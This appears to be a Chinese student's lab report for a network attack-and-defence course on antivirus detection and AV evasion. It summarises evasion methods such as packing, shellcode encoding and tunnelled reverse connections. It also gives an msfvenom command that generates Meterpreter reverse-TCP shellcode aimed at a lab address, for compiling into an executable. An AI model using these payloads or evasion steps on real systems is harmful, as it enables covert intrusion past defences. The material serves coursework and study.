zoukankan      html  css  js  c++  java
  • 20169201 2016-2017-2 《网络攻防》第十四周作业

    1.基础问题回答

    (1)杀软是如何检测出恶意代码的?

    杀毒软件对于恶意软件的检测分为三种:

    • 基于特征码的检测:特征码就是一段或多段数据,如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码,因此杀毒软件厂商就需要拥有最新最全的特征码库,也就是所谓的病毒库。
    • 启发式恶意软件检测:简单来说就是一个软件从各方面看起来都像是一个病毒,杀毒软件就觉得它是一个病毒了,只不过这种方式的准确性没有基于特征码的高,但是这种方式可以检测到0-day恶意软件,具有一定通用性
    • 基于行为的恶意软件检测:从理论上可以说是加入了行为监控的启发式检测

    (2)免杀是做什么?

    简单地说就是对恶意软件进行处理,让杀毒软件和防火墙检测不出来,避免被查杀

    (3)免杀的基本方法有哪些?

    • 改变特征码,例如给EXE加壳,通过这种方式让杀毒软件无法进行反汇编、逆向操作,又或者对ShellCode进行编码重组

    • 改变行为

      • 通讯方式:尽量使用反弹式连接,使用隧道技术,加密通讯数据
      • 操作模式:基于内存操作,减少对系统的修改,加入混淆作用的正常功能代码
    • 其他方法

      • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
      • 使用社工类攻击,诱骗目标关闭AV软件。
      • 纯手工打造一个恶意软件

    2.实践总结与体会

    这次实验学习了杀软查杀病毒的原理以及免杀技术。安装防火墙和杀软,并不能保证自己的电脑的免受攻击,了解病毒程序的原理可以增强防护意识。

    3.离实战还缺些什么技术或步骤?

    虽然能够免杀,但是并没有植入其他电脑的方式,比如没有自己复制的功能或者利用系统或协议漏洞进行攻击的步骤

    4.实践过程记录

    (1)msfvenom直接生成meterpreter可执行文件

    windows ip:192.168.1.123
    kali ip:192.168.17.137
    根据攻击机的IP用msfvenom直接生成meterpreter可执行文件

    将其复制到Windows桌面,一开始防火墙会自动隔离,打开防火墙允许该文件,将文件传至网站:www.virscan.org进行检测,检测结果如下:

    通过上面的实验可以看出现在编码的方式没有免杀的功能,还是要变换方式进行免杀的改造

    (2)用Veil-Evasion生成可执行文件

    打开Veil-Evation,按照menu提示进行相关操作

    复制到主机,上传检测,检测结果如下:

    (3)使用c语言调用shellcode

    使用命令

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.17.137 LPORT=443 -f c
    


    使用codeblock对数组进行编译生成exe文件,上传文件进行检测。检测结果如下:

    5.遇到的问题与解决过程

    1.不知道对shellcode 数组如何进行编译

    解决方案:参考C语言执行shellcode的五种方法

  • 相关阅读:
    python-django-自定义分页
    self.user = serializer_field.context['request'].user KeyError: 'request
    无法ssh远程的解决办法
    关于put和patch区别的一篇文章
    一遍关于django rest framework serializer比较详细的笔记
    vim 简单配置(根据编程语言不同,自动缩进)
    django rest framework 的api返回html
    django rest frmaework jwt认证
    django 信号
    刘江的博客
  • 原文地址:https://www.cnblogs.com/tcle/p/6937128.html
Copyright © 2011-2022 走看看